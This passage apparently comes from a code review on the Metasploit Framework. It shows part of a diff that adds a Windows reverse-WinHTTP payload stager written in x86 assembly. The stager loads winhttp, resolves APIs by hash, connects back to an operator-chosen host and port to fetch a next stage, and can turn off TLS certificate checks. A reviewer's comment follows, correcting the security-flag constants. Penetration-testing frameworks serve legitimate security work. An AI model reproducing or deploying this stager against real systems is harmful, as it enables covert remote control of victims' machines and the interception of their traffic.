lib/msf/core/payload/windows/reverse_winhttp.rb

```diff
@@ -0,0 +1,306 @@
+      http_open_flags = (0x00800000 | 0x00000100)
+    else
+      # ;0x00000100  ; WINHTTP_FLAG_BYPASS_PROXY_CACHE
+      http_open_flags = 0x00000100
+    end
+
+    asm = %Q^
+      ; Input: EBP must be the address of 'api_call'.
+      ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+      load_winhttp:
+        push 0x00707474        ; Push the string 'winhttp',0
+        push 0x686E6977        ; ...
+        push esp               ; Push a pointer to the "winhttp" string
+        push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+        call ebp               ; LoadLibraryA( "winhttp" )
+
+      set_retry:
+        push.i8  6             ; retry 6 times
+        pop edi
+        xor ebx, ebx
+        mov ecx, edi
+
+      push_zeros:
+        push ebx               ; NULL values for the WinHttpOpen API parameters
+        loop push_zeros
+
+      WinHttpOpen:
+                               ; Flags [5]
+                               ; ProxyBypass (NULL) [4]
+                               ; ProxyName (NULL) [3]
+                               ; AccessType (DEFAULT_PROXY= 0) [2]
+                               ; UserAgent (NULL) [1]
+        push 0xBB9D1F04        ; hash( "winhttp.dll", "WinHttpOpen" )
+        call ebp
+
+      WinHttpConnect:
+        push ebx               ; Reserved (NULL) [4]
+        push #{opts[:port]}    ; Port [3]
+        call got_server_uri    ; Double call to get pointer for both server_uri and
+      server_uri:              ; server_host; server_uri is saved in EDI for later
+        db #{encoded_url}
+      got_server_host:
+        push eax               ; Session handle returned by WinHttpOpen [1]
+        push 0xC21E9B46        ; hash( "winhttp.dll", "WinHttpConnect" )
+        call ebp
+
+      WinHttpOpenRequest:
+
+        push.i32 #{"0x%.8x" % http_open_flags}
+        push ebx               ; AcceptTypes (NULL) [6]
+        push ebx               ; Referrer (NULL) [5]
+        push ebx               ; Version (NULL)  [4]
+        push edi               ; ObjectName (URI) [3]
+        push ebx               ; Verb (GET method) (NULL)  [2]
+        push eax               ; Connect handler returned by WinHttpConnect [1]
+        push 0x5BB31098        ; hash( "winhttp.dll", "WinHttpOpenRequest" )
+        call ebp
+        xchg esi, eax          ; save HttpRequest handler in esi
+      ^
+
+    if opts[:ssl]
+      asm << %Q^
+        ; WinHttpSetOption (hInternet, WINHTTP_OPTION_SECURITY_FLAGS, &buffer, sizeof(buffer) );
+        set_security_options:
+          push 0x00003380
+            ;0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
+            ;0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
+            ;0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
+            ;0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
+            ;0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
```

Comment:
Doh. I must have mixed these up going through the WinInet flags. Double-checking and I only see the following defined:
```
#define SECURITY_FLAG_IGNORE_UNKNOWN_CA         0x00000100
#define SECURITY_FLAG_IGNORE_CERT_DATE_INVALID  0x00002000 
#define SECURITY_FLAG_IGNORE_CERT_CN_INVALID    0x00001000 
#define SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE   0x00000200
```